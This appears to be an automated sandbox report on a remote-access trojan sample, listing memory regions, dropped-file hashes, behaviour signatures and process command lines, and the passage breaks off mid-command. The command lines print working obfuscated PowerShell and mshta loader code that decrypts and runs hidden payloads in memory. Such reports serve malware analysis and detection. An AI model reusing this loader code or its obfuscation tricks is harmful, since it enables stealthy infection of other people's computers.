memory/4644-36-0x000001F180000000-0x000001F180024000-memory.dmp
memory/3112-37-0x00007FF8E4EC0000-0x00007FF8E5982000-memory.dmp
memory/4644-39-0x00007FF8F3790000-0x00007FF8F384D000-memory.dmp
memory/4644-38-0x00007FF8F49E0000-0x00007FF8F4BE9000-memory.dmp
memory/3112-40-0x00007FF8E4EC0000-0x00007FF8E5982000-memory.dmp
memory/4644-41-0x000001F180330000-0x000001F180D80000-memory.dmp
memory/4644-43-0x000001F180D90000-0x000001F180E36000-memory.dmp
memory/4644-45-0x000001F180EA0000-0x000001F180EF8000-memory.dmp
memory/4644-44-0x000001F180E40000-0x000001F180E96000-memory.dmp
memory/4644-46-0x000001F180F00000-0x000001F180F22000-memory.dmp
memory/4644-49-0x000001F180FE0000-0x000001F180FEA000-memory.dmp
memory/4644-47-0x00007FF8F49E0000-0x00007FF8F4BE9000-memory.dmp
memory/1980-51-0x0000000140000000-0x0000000140004000-memory.dmp
memory/1980-50-0x0000000140000000-0x0000000140004000-memory.dmp
memory/2700-52-0x0000000000400000-0x0000000000406000-memory.dmp
memory/2700-53-0x0000000000400000-0x0000000000406000-memory.dmp
C:\Windows\$sxr-mshta.exe
| MD5 | 356e04e106f6987a19938df67dea0b76 |
| SHA1 | f2fd7cde5f97427e497dfb07b7f682149dc896fb |
| SHA256 | 4ed8a115fa1dcfd532397b800775c1b54d2d407b52118b5423e94ff1ce855d7e |
| SHA512 | df1c655fa3a95e001084af8c3aa97c54dbcb690210e1353dd836702cfb4af3c857449df62aa62d7ab525ffb4e0dc1552181dfcdee2c28f4af5c20df6d95811cd |
C:\Windows\$sxr-cmd.exe
| MD5 | c5db7b712f280c3ae4f731ad7d5ea171 |
| SHA1 | e8717ff0d40e01fd3b06de2aa5a401bed1c907cc |
| SHA256 | f6c9532e1f4b66be96f0f56bd7c3a3c1997ea8066b91bfcc984e41f072c347ba |
| SHA512 | bceaf7dc30f2c99b40b7025a5eb063f3131a1ef9349fdf356720eaef838bcf58ce3d5e3bad9459ddd2f872df430bdb66a766a5acff5d3bbc738eba8945cb0a89 |
memory/3140-75-0x00007FF8F49E0000-0x00007FF8F4BE9000-memory.dmp
memory/3140-76-0x00007FF8F3790000-0x00007FF8F384D000-memory.dmp
memory/3140-77-0x000001B278DE0000-0x000001B279364000-memory.dmp
memory/3140-78-0x000001B279760000-0x000001B279F2A000-memory.dmp
memory/3140-79-0x000001B279F30000-0x000001B27A36E000-memory.dmp
memory/3140-80-0x000001B27A370000-0x000001B27A422000-memory.dmp
memory/3140-81-0x00007FF8F49E0000-0x00007FF8F4BE9000-memory.dmp
memory/3140-89-0x000001B27BAA0000-0x000001B27BAF0000-memory.dmp
memory/3140-90-0x000001B27BBB0000-0x000001B27BC62000-memory.dmp
memory/3140-91-0x000001B27BE40000-0x000001B27C002000-memory.dmp
memory/3140-100-0x000001B27BAF0000-0x000001B27BB2C000-memory.dmp
memory/3140-101-0x000001B27BA50000-0x000001B27BA9E000-memory.dmp
memory/3140-103-0x00007FF8F3790000-0x00007FF8F384D000-memory.dmp
memory/3140-104-0x000001B27BB30000-0x000001B27BB66000-memory.dmp
memory/3140-102-0x00007FF8F49E0000-0x00007FF8F4BE9000-memory.dmp
memory/4716-105-0x0000000140000000-0x0000000140028000-memory.dmp
memory/4716-106-0x0000000140000000-0x0000000140028000-memory.dmp
memory/4716-108-0x00007FF8F3790000-0x00007FF8F384D000-memory.dmp
memory/4716-107-0x00007FF8F49E0000-0x00007FF8F4BE9000-memory.dmp
memory/2600-109-0x0000000000400000-0x0000000000420000-memory.dmp
memory/2600-110-0x0000000000400000-0x0000000000420000-memory.dmp
memory/2600-112-0x0000000000400000-0x0000000000420000-memory.dmp
memory/2600-114-0x0000000001730000-0x000000000174A000-memory.dmp
memory/640-119-0x0000028CDD830000-0x0000028CDD857000-memory.dmp
memory/468-123-0x000001D500590000-0x000001D5005B7000-memory.dmp
memory/692-128-0x00007FF8B4A70000-0x00007FF8B4A80000-memory.dmp
memory/996-131-0x00007FF8B4A70000-0x00007FF8B4A80000-memory.dmp
memory/420-138-0x000002B9B30C0000-0x000002B9B30E7000-memory.dmp
memory/1120-151-0x000001EFAA6F0000-0x000001EFAA717000-memory.dmp
memory/1096-148-0x000002906EE60000-0x000002906EE87000-memory.dmp
memory/1096-149-0x00007FF8B4A70000-0x00007FF8B4A80000-memory.dmp
memory/420-139-0x00007FF8B4A70000-0x00007FF8B4A80000-memory.dmp
memory/424-135-0x00007FF8B4A70000-0x00007FF8B4A80000-memory.dmp
memory/424-134-0x0000024D61C90000-0x0000024D61CB7000-memory.dmp
memory/996-130-0x0000012C24260000-0x0000012C24287000-memory.dmp
memory/468-125-0x00007FF8B4A70000-0x00007FF8B4A80000-memory.dmp
memory/640-124-0x00007FF8B4A70000-0x00007FF8B4A80000-memory.dmp
memory/692-121-0x00000149E4CE0000-0x00000149E4D07000-memory.dmp
memory/640-117-0x0000028CDD800000-0x0000028CDD822000-memory.dmp
memory/4716-115-0x0000000140000000-0x0000000140028000-memory.dmp
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.4dc3ac07-b339-43cc-901e-cb521eccfa3a.tmp.csv
| MD5 | 0dfe21816632d1f53f37eb791b02a24e |
| SHA1 | 0a1763d0752e0334fee2cd905aa230048e6a5113 |
| SHA256 | 964e2f3426ab175c933c9149d8fe4302f555d2d346b344ce19a0c53d6867bd1d |
| SHA512 | decdb66522217c5ca36fa6faceeb995df7ad056f4d409401cbb1cf38efc4ee0755162c2b7e884a64f9fa61d73638d77ed9021ca234b55bf061ae28e5db91555f |
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.9ff30b4f-331b-4e0b-b799-a69fe5191378.tmp.txt
| MD5 | bb127983170b4affbd37e7c7c1d58f74 |
| SHA1 | 28cd2c40bedbad606c1c27e36194c655eaca71e0 |
| SHA256 | abc080af4d4156467aea3f74cbb8f0a2f32d45ff26973fcf8974555d714e92e2 |
| SHA512 | 73af4e872963c0e8c3cf906af707371e8a6c6ffa8fa79f182e1b5958b3ba5b019276dee629d511ea6d3430b18675ec17bf5a59c899490a12c46f9a0e840cf98c |
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.ff54c4ef-f9ba-4dcf-831f-aed520c76a2f.tmp.csv
| MD5 | 2b4730b3193d16fb35ce5333c41054b0 |
| SHA1 | c8797e421c6baa8347007d495c8dd45fe722672a |
| SHA256 | 0b628a9b5530e085441ae850b04b11402a48926f6552c771d0c3eeb1a273c0ae |
| SHA512 | daa5bbe52eb182c0c773cdada347084ef90065d672edf87ce730c6c52f1f414e02b3a4d24537fbe3f0c5b78a9f8b25f841135704af0dd1aaa4feb939d9d27a84 |
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.d36101a0-8bbc-4f58-9376-e66b1e9d058e.tmp.txt
| MD5 | 19dd5bf5f040cd8938d4906de40fc6b4 |
| SHA1 | 6897482ae7731de937b323da5fb470722fa7df98 |
| SHA256 | ef42103f97d449551d0b0b2b0ec157e6dea6a9f42117699cbf43fa6f3f99e7e6 |
| SHA512 | f1b23f9cbdcb89ea12ecef4f40990a6c48ba7f0a330fa784f56c02db9fe5e89310ccad5f3cde2ea332fbd4359e3beb910b64c79bd5b7d452002be3cf6019a070 |
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.343706d5-b3a5-4b5a-9558-4aee2662dc89.tmp.csv
| MD5 | a1943b66516a4160e4a1dfd76bb862fe |
| SHA1 | ded42d5dbf064403aa95e7dbca31927e6e2abcf9 |
| SHA256 | fac149a4a9ca62ac11ad9d680cec535f259a18ccf725607cd9057fc96b372053 |
| SHA512 | 32433e1bfb993dcc22588044edee28270df62b9462caf5abf5963175c656fab4eea211bbe154fdc8e14eecceaad59ab2459d82caeb3445136dd5d0ef72c2d7e9 |
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.26a1de1a-702b-4c53-ba3b-e4209748b7bc.tmp.txt
| MD5 | efdb005de50dcccd0e5a0d9c9cb69eb3 |
| SHA1 | b31b96ff9d4a5fbbb98ff972fff5222c1b96c7e0 |
| SHA256 | 873f276fed49ddb032081564121b5a002c415890b53ddacd183f8bf56bb5ee16 |
| SHA512 | 813320b292689e172832f3a4cf60597c8501d0abc5d01d3080d4c5cb398dfcb4d2979fee66675f3a8767433646dc8e396483fc07a083add21ff1e58a7da5a21a |
Analysis: behavioral5
Detonation Overview
Submitted
2024-08-18 13:35
Reported
2024-08-18 13:37
Platform
win7-20240704-en
Max time kernel
22s
Max time network
19s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Release\VanillaRat.exe
"C:\Users\Admin\AppData\Local\Temp\Release\VanillaRat.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -WindowStyle Hidden -command "& {Start-Process -FilePath 'Handlers\Handler.bat' -WindowStyle Hidden -Wait}
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat" "
C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe
"Handler.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function AsZVG($IObBH){ $nGKhQ=[System.Security.Cryptography.Aes]::Create(); $nGKhQ.Mode=[System.Security.Cryptography.CipherMode]::CBC; $nGKhQ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $nGKhQ.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('z1mnkXiSZPv8R2MpZKBD3X42qpFHtc3mYWmVqJ/jqFk='); $nGKhQ.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oe8taAs+mjon3dfZMtxPIg=='); $IIMfj=$nGKhQ.CreateDecryptor(); $return_var=$IIMfj.TransformFinalBlock($IObBH, 0, $IObBH.Length); $IIMfj.Dispose(); $nGKhQ.Dispose(); $return_var;}function nroxc($IObBH){ $lXPBt=New-Object System.IO.MemoryStream(,$IObBH); $jzRog=New-Object System.IO.MemoryStream; $raowK=New-Object System.IO.Compression.GZipStream($lXPBt, [IO.Compression.CompressionMode]::Decompress); $raowK.CopyTo($jzRog); $raowK.Dispose(); $lXPBt.Dispose(); $jzRog.Dispose(); $jzRog.ToArray();}function Dtllp($IObBH,$RqHgm){ $OepAU=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$IObBH); $TRlDt=$OepAU.EntryPoint; $TRlDt.Invoke($null, $RqHgm);}$pyjrp=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat').Split([Environment]::NewLine);foreach ($FdSgb in $pyjrp) { if ($FdSgb.StartsWith('SEROXEN')) { $AdNpy=$FdSgb.Substring(7); break; }}$tMmhK=[string[]]$AdNpy.Split('\');$vypGp=nroxc (AsZVG ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($tMmhK[0])));$asijd=nroxc (AsZVG ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($tMmhK[1])));Dtllp $asijd (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));Dtllp $vypGp (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));
Network
Files
memory/2432-0-0x000007FEF56C3000-0x000007FEF56C4000-memory.dmp
memory/2432-1-0x0000000000A20000-0x0000000000BDE000-memory.dmp
memory/2432-2-0x000007FEF56C0000-0x000007FEF60AC000-memory.dmp
memory/2432-3-0x000000001BEF0000-0x000000001BFD0000-memory.dmp
memory/2432-4-0x000007FEF56C0000-0x000007FEF60AC000-memory.dmp
memory/2840-9-0x000007FEECC8E000-0x000007FEECC8F000-memory.dmp
memory/2840-10-0x000000001B350000-0x000000001B632000-memory.dmp
memory/2840-11-0x0000000001F60000-0x0000000001F68000-memory.dmp
memory/2840-12-0x000007FEEC9D0000-0x000007FEED36D000-memory.dmp
memory/2840-13-0x000007FEEC9D0000-0x000007FEED36D000-memory.dmp
memory/2840-14-0x000007FEEC9D0000-0x000007FEED36D000-memory.dmp
memory/2840-15-0x000007FEEC9D0000-0x000007FEED36D000-memory.dmp
memory/2432-16-0x000007FEF56C3000-0x000007FEF56C4000-memory.dmp
memory/2432-17-0x000007FEF56C0000-0x000007FEF60AC000-memory.dmp
memory/2840-18-0x000007FEEC9D0000-0x000007FEED36D000-memory.dmp
memory/2840-19-0x000007FEECC8E000-0x000007FEECC8F000-memory.dmp
\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe
| MD5 | 852d67a27e454bd389fa7f02a8cbe23f |
| SHA1 | 5330fedad485e0e4c23b2abe1075a1f984fde9fc |
| SHA256 | a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8 |
| SHA512 | 327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d |
memory/2840-25-0x000007FEEC9D0000-0x000007FEED36D000-memory.dmp
Analysis: behavioral6
Detonation Overview
Submitted
2024-08-18 13:35
Reported
2024-08-18 13:37
Platform
win10-20240404-en
Max time kernel
60s
Max time network
21s
Command Line
Signatures
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 4588 created 564 | N/A | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | C:\Windows\system32\winlogon.exe |
| PID 4588 created 564 | N/A | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | C:\Windows\system32\winlogon.exe |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Control Panel\International\Geo\Nation | C:\Windows\$sxr-mshta.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
| N/A | N/A | C:\Windows\$sxr-mshta.exe | N/A |
| N/A | N/A | C:\Windows\$sxr-cmd.exe | N/A |
| N/A | N/A | C:\Windows\$sxr-powershell.exe | N/A |
Hide Artifacts: Hidden Window
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\$sxr-powershell.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4588 set thread context of 656 | N/A | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | C:\Windows\System32\dllhost.exe |
| PID 4588 set thread context of 1632 | N/A | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | C:\Windows\SysWOW64\dllhost.exe |
| PID 4588 set thread context of 1600 | N/A | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | C:\Windows\System32\dllhost.exe |
| PID 4588 set thread context of 3872 | N/A | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | C:\Windows\SysWOW64\dllhost.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\$sxr-cmd.exe | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
| File opened for modification | C:\Windows\$sxr-cmd.exe | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
| File created | C:\Windows\$sxr-powershell.exe | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
| File opened for modification | C:\Windows\$sxr-powershell.exe | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
| File created | C:\Windows\$sxr-mshta.exe | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
| File opened for modification | C:\Windows\$sxr-mshta.exe | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance | C:\Windows\$sxr-mshta.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\dllhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\dllhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\$sxr-powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\dllhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\dllhost.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Users\Admin\AppData\Local\Temp\Release\VanillaRat.exe
"C:\Users\Admin\AppData\Local\Temp\Release\VanillaRat.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -WindowStyle Hidden -command "& {Start-Process -FilePath 'Handlers\Handler.bat' -WindowStyle Hidden -Wait}
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat" "
C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe
"Handler.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function AsZVG($IObBH){ $nGKhQ=[System.Security.Cryptography.Aes]::Create(); $nGKhQ.Mode=[System.Security.Cryptography.CipherMode]::CBC; $nGKhQ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $nGKhQ.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('z1mnkXiSZPv8R2MpZKBD3X42qpFHtc3mYWmVqJ/jqFk='); $nGKhQ.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oe8taAs+mjon3dfZMtxPIg=='); $IIMfj=$nGKhQ.CreateDecryptor(); $return_var=$IIMfj.TransformFinalBlock($IObBH, 0, $IObBH.Length); $IIMfj.Dispose(); $nGKhQ.Dispose(); $return_var;}function nroxc($IObBH){ $lXPBt=New-Object System.IO.MemoryStream(,$IObBH); $jzRog=New-Object System.IO.MemoryStream; $raowK=New-Object System.IO.Compression.GZipStream($lXPBt, [IO.Compression.CompressionMode]::Decompress); $raowK.CopyTo($jzRog); $raowK.Dispose(); $lXPBt.Dispose(); $jzRog.Dispose(); $jzRog.ToArray();}function Dtllp($IObBH,$RqHgm){ $OepAU=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$IObBH); $TRlDt=$OepAU.EntryPoint; $TRlDt.Invoke($null, $RqHgm);}$pyjrp=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat').Split([Environment]::NewLine);foreach ($FdSgb in $pyjrp) { if ($FdSgb.StartsWith('SEROXEN')) { $AdNpy=$FdSgb.Substring(7); break; }}$tMmhK=[string[]]$AdNpy.Split('\');$vypGp=nroxc (AsZVG ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($tMmhK[0])));$asijd=nroxc (AsZVG ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($tMmhK[1])));Dtllp $asijd (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));Dtllp $vypGp (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{05f2ac45-92e4-4f14-8881-ace328a0574e}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{d36bbe4c-8175-4128-847f-69464971dbfa}
C:\Windows\$sxr-mshta.exe
C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-SuFaBOaZkphcFfsPxOCG4312:&#<?=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"
C:\Windows\$sxr-cmd.exe
"C:\Windows\$sxr-cmd.exe" /c %$sxr-SuFaBOaZkphcFfsPxOCG4312:&#<?=%
C:\Windows\$sxr-powershell.exe
C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function sXCMM($CkDpq){ $zljWq=[System.Security.Cryptography.Aes]::Create(); $zljWq.Mode=[System.Security.Cryptography.CipherMode]::CBC; $zljWq.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $zljWq.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0='); $zljWq.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg=='); $QOVuV=$zljWq.('rotpyrceDetaerC'[-1..-15] -join '')(); $XqeJd=$QOVuV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CkDpq, 0, $CkDpq.Length); $QOVuV.Dispose(); $zljWq.Dispose(); $XqeJd;}function pIPqe($CkDpq){ $RVxvX=New-Object System.IO.MemoryStream(,$CkDpq); $MPpXr=New-Object System.IO.MemoryStream; $tIDwQ=New-Object System.IO.Compression.GZipStream($RVxvX, [IO.Compression.CompressionMode]::Decompress); $tIDwQ.CopyTo($MPpXr); $tIDwQ.Dispose(); $RVxvX.Dispose(); $MPpXr.Dispose(); $MPpXr.ToArray();}function OVJQF($CkDpq,$HUtBG){ $QhIbf=[System.Reflection.Assembly]::Load([byte[]]$CkDpq); $edhhl=$QhIbf.EntryPoint; $edhhl.Invoke($null, $HUtBG);}$zljWq1 = New-Object System.Security.Cryptography.AesManaged;$zljWq1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zljWq1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zljWq1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0=');$zljWq1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg==');$dKTJk = $zljWq1.('rotpyrceDetaerC'[-1..-15] -join '')();$RVcQq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Nh0O9Tq4WhjVRVv6TIlxng==');$RVcQq = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq, 0, $RVcQq.Length);$RVcQq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq);$OATYX = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join 
'')('DphlnsvScNekfgsLVTd7mzDTpuPYV2uzlVKF5APiXTs=');$OATYX = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OATYX, 0, $OATYX.Length);$OATYX = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OATYX);$pxqaL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VOurjNNOAf3rWCyDVTfXEg==');$pxqaL = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($pxqaL, 0, $pxqaL.Length);$pxqaL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($pxqaL);$sZmZm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bwCwxwfgvgLvd83CID2tuY2PW5n2F6O9HvfP0OXG8B2If0HCFuJvOfQkZnJJHGqr4W77keqJnrHoUOLsxavQfVPJgnZi5dCVwfqInTPzI5sB/ovu8wzR06kYDbDCFSZIUmhZnetqX07nQ3nN2G8dx8hDcvN8OEtke141bP5XbYA7V7pEdDf3FgqTYuWoMaz+k56vPVibKCooeH7zQ3DK29EBBQ9NAhbbXDFzReMv7zlMDbkoqlsAAEqbrXnoCu5yb4MKtcf+DHcvr/3wdC9bIKzrVR+Z59S5tuu5Ot2efgPcTwmjF9AfsSO6Z0XGodft9zU2RXKHKxayYhES9v/HDue0kdAd1egn28t4LVgg/sk/Lq23+HYJ+gLzHX2a8njudWREXxqxpxGUV/yJzhNVaEtLryDlFlbG61xiz9rtJRc=');$sZmZm = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($sZmZm, 0, $sZmZm.Length);$sZmZm = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($sZmZm);$hunvf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rq5zXkyy0NL/id4X1CFNpQ==');$hunvf = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hunvf, 0, $hunvf.Length);$hunvf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($hunvf);$uooKb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wR0HI5liF2OH5JSIeYrcUA==');$uooKb = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uooKb, 0, $uooKb.Length);$uooKb = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uooKb);$HssPO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wr1hAjwP3vd25eg2X2PyLA==');$HssPO = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($HssPO, 0, $HssPO.Length);$HssPO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] 
-join '')($HssPO);$coosp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('W+228sMz/VVvzW5Wi2DfeQ==');$coosp = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($coosp, 0, $coosp.Length);$coosp = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($coosp);$cqFrb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('LnPkErAMqZ8UA2dOM3NRUw==');$cqFrb = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cqFrb, 0, $cqFrb.Length);$cqFrb = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cqFrb);$RVcQq0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jzKuA/Szphx4DaASO5/17A==');$RVcQq0 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq0, 0, $RVcQq0.Length);$RVcQq0 = 